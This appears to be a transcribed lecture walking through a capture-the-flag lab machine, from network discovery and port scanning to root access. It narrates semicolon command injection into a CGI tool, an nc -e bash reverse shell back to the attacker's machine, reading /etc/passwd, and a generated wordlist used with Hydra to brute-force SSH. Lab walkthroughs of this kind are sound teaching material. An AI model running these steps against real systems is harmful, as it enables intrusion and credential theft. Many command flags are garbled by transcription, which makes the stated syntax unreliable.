All right. Now we saw from the previous lecture that we are able to ping the machine. By the way, why I did know about the IP, or how did I know about the IP? Actually, from the console, from the ridiculously easy itself, they provide the IP. But imagine they are not providing the IP. How should I know about this machine? I would use a tool called net discover. So net discover like that, and press enter. By the way, you need to be a root, no problem. Press enter. All right, cool. Now you can see that we are seeing a lot of machines actually, including this one. Okay, so let's click Ctrl C. So you can see that we are seeing this machine. This is our machine. Now you may ask me, how did I know? Yeah, because the IP is already provided there. By the way, here you can see that the IP is already here. But how did I know about it? I need to start guessing one machine one by one. Actually, this is the right way. Okay, but because we don't care right now, we already know this is the machine, so we will assume that this is the machine. Actually, it is the machine, it's not just assumption. All right. Okay, now this is the first step. Now we will start scanning this machine. As we learned previously, we will use the nmap utility. So nmap, we will use the -ss and -a and -b dash, which is the all ports. By the way, -a as aggressive, which is all, -b dash for all ports, -s, this is stealth or sin attack. Okay, and -o n capital, then nmap underscore scan, this is to use this script, and provide the IP address of the machine. Of course, we need to have root access here, like this, so it will start scanning. Let's wait a little bit to see what it will show us. All right, cool. Now we are seeing more information. Now, if you check here, actually, so let me scroll a little bit, decrease the size of the window. So here you can see that we are having FTP, anonymous FTP login is allowed. Now, this is something very problematic. Actually, this is the first flag we are seeing here, as you can see, and we have this folder. All right, so the first step is open FTP to this machine. The anonymous without password, and you can see that we are logged in successfully. Cool. If I type ls, you can see that, yeah, here is our flag. If I go to the pub ls, you can see that we don't have anything here. So let's return back. You can see, now let's get this flag, the text file. Now we have it. Ctrl X, you can see that we have it here. So if I type cat fx, you can see that flag, oh, this is unexpected, which is, this is a 10 point. By the way, if I go to the browser here, and if I type the IP address of the machine, which I will get from here, yeah, and if I go to the port 9090, by the way, this is, I know about from here, the admin console. Okay, so press enter, advance, accept the risks, and go. So you can see that we have this flag. Now again, what did we find again from the nmap? You can see that we found this, that we have the unknown port, which is this one, and as you can see, it is giving us that flag, whatever they found, whatever 10 point. Okay, so this port, it seems it is a flag. So I will use nc, as we learned previously, the IP address, then 13, which is the port here, I think 337. Okay, now you can see that when I try to connect, we got another flag. All right, cool. Now again, we have another port, which is the 60,000, which is this one. Okay, and you can see that it is fishy. So again, let's connect to it and let's see what it will show us. Yeah, welcome to Rick half-baked reverse shell. So you can see that we are here. So ls, you can see that If I type flag, yeah, we got another flag. But when I try to go to somewhere else, the permission denied. Okay, cool. So far so good. Now again, remember when we saw that we have the port 9090 open, as you can see, here it is. So let's use the dir-b https, the IP address, and let's choose the -r to search recursively, and let's see what we will find. We didn't find anything, so let's check this time with port 9090. We didn't find anything useful. Again, let's search this time with HTTP. All right, like this. Oh, now we are seeing another things. As you can see, we are seeing robots here and we have passwords. So let's go to the robots. By the way, how did I click on this? Click Control button and then click the mouse. Okay, this will open the browser for you. So they are robots, Morty. It is okay to shoot them. They are just robots. As you can see, these ones. Again, and we have passwords here. And the password, we have another flag, the text. Okay, cool. Now you can see that it is an easy machine, but it get us to practice more what we learned from the tools. Okay, so this password is something else again. Now when I go here, if I click right click and to see page source, you can see that in the page itself we have the password, and as it is winter, so this is the password actually. Okay, so far so good. Now from here, from the robots, we have some tools actually, or some stuff. So you can see /CGI bin trace tool. You can copy that and paste it. So let's duplicate this tab. So let's put it here, CGI. Oh, now we are seeing another stuff. Now here to enter an IP address. So let's put whatever IP address we want and trace. You can see that it is start tracing. Okay, now let's try put ls here. Now ls didn't work. Now let's try put semicolon ls, and let's see now. Yeah, you can see that putting a semicolon we are seeing value. Okay, now if this did work, now let's try to use the nc reverse shell. Okay, so nc here -nvlp, put the port 4444. Now here put a semicolon, nc -e to open a bash. Okay, the IP address of my machine, and let me get that ifconfig, which is this one. Then the port 4444. Okay, now let's click on press. You can see that now we are connected. Now if I type ls here, you can see that yeah, we are inside it. ID, you can see that yeah, we are using the UID Apache. Okay, now let's cat some file etc password, which is where our users on the Linux machine. By the way, you can see when I try to use the cat machine, it will show us a cat picture. So let's try tail, for example, tail /etc/password. Yeah, you can see that we have some values or some users, and we have these users. As you can see, Rick, Scanzes, Morty, Summer, whatever. All right. So let's use the Summer user for now. Just keep that in your mind. Now, if you scroll up to see what we got again from the scanning, you can see that the port 22 is open. All right. So far, so good. So now click from this console SSH to the IP address. Okay, actually 107. And now let's try the Summer user at this IP and press enter. You can see that it is not working. Now let's put the S capital this time. Again, it is not working. Now let's scroll up here. You can see that from the nmap we are having another command, which is, or another port open, which is 22222. Okay, 22,222, Okay, now let's try this port actually instead of the SSH alone. So here -B and 1 2 3 4 5, press enter. Oh, now we are seeing a connection. Yes, now it will ask for password. Now let's try get this password that we got from here, the winter. Now we are connected. Cool. Now if I type ls, you can see that we have flag here, cat flag. Again, it will show us this cat thing. So let's tell flag, whatever. Yeah, you can see that we have another flag. Now I am here inside the home summer. So let's go to the home directory. Now we have some values here. So let's go to Morty. Yeah, oh, we are able to access anything. So if that's the case, so actually let's get all of these files into our local machine. So let's make directory here. Let's name it lab. Let's go to it. Now let's use the scp command for secure copy. The port is 52s and then the user is summer at 168.107, and then we want the home directory Morty and everything inside it. Okay, and we want it to be here, okay, on the lab file. Now the password will be the same, the winter thing, and you can see that now we have all the files, the save password and the journal text. Okay, now we have two files, the save password and we have the journal. Now if I open the save password, by the way, we can use the EOG and save password. You can see that the command is not found, but we can install it. Yeah, let's install it. This is on my local machine, by the way, on Kali Linux machine. Okay, now EOG again, save password, whatever. You can see that we have this picture. All right, cool. Now if I unzip this file, journal, you can see that it is password protected. Okay, so you can see that maybe this image can give us some information. I will use the string command. This is to give us a string values. You can see that the strings, I made a mistake here. Yeah, you can see that if I scroll up, you can see that this is the password, the save password file, Morty, text, whatever, and this is the password. All right, so again, unzip the file, put the password. Now we have journal.txt. So if I open it, or cat it actually, here we have another flag. Now again, let's SSH to the machine again. And the password is winter. Okay, now we are inside it. Now let's go to the rec, this one. All right, now inside it we have this doesn't contain a flag. If I cat it, or let's tail it actually, not a flag, you can see you are totally failed for it, whatever, this is not a flag, no problem. Let's go to the another directory. We have cat save again, cat save. Yeah, you can see that this is, it seems that this is a binary file. So if I put the file command, you can see that, yeah, it is elf executable linkable format file. No problem. Let's try to run this file. You can see that it will show us permission denied. Maybe we can run sudo ls winter. You can see that the sudo or the summer user is not in the sudoers file. No problem. Actually, let's get this file into our local machine. So quick from here, scp again, and this time it will be, let's go and get the directory, and it is rec. Save this one, and then it is save. Okay, it is winter. Yeah, we have the save here. Okay, so if I run the save, you can see that error while loading, cannot open shard, no such file or directory. By the way, if you got this error, no problem. Just install the libmcrypt. Okay. So now let's run again. You can see that whatever something, it would tell us that it need a command line argument. Now let's get the same file or the same value we got from here as an argument, which is 131333. Okay. Oh, now we are seeing a different values, and actually we are seeing a flag. By the way, we have here Rex password hints. This is in case I forget. I just hope I don't forget how to write script to generate potential password. Also, sudo is really good. Follow these clues in order. As you can see, one uppercase character, one digit, and one of the words in my old band's name. So I need to go to Google and search for Rick Sankey's band's name. You can see it is the Flesh Curtains. Okay, no problem. Okay, now we want to write a Python script to brute force or to generate a passwords with this value. So from here, vim as.py, now from string import ASCII underscore uppercase. Now here let's put the band name equal Flesh, and let's put the curtains. Then f equal open. Now let's put a file or open a file, list.txt, and w as a write. Now let's make a for loop l in. Now let's put here as ASCII underscore uppercase, or let's to have a shortcut, we can just put a u. Okay, and we from here ASCII uppercase as a u. Okay, and digits as ds. Now again d in ds. See, this is for digits, and then for n in band name. Now f dot write, and here in double quotation let's have this as a format, backslash n, in that format l slash d slash n, and now let's f to close. Okay, like this. So let's save that, chmod plus x as.py. Now let's run python 3 as.py. Now we have list.txt. Let's cat it. Now, yeah, we have all the values that we need. Now let's use Hydra to brute force the machine. So Hydra -s for the port number, which will be 2222 SSH, because the port will be, or the protocol is SSH, the IP address, then -l for the username, and the username will be Rick as capital Sankey's, -p, we will use the word list for the word list, and it will be list, and -v for verbose, and t for thread, and we will choose 4. Now press enter. Now let's see what we will find. Actually, I did a mistake. It is z not s. This is the user. So again, press enter. Now after some times, you can see that actually I skip it. You can see that we have the password. So now let's try to access this machine through SSH using this user and password. Right, now let's put this user, and the password will be b7 curtains. Yeah, now we are here. So if I type sudo su dash again, oh, now if I type id, you can see that I am inside the root. Actually, I have the root shell. So if I type flag.txt, actually tail, you can see that we have the final flag. Hope you enjoyed it, and thanks for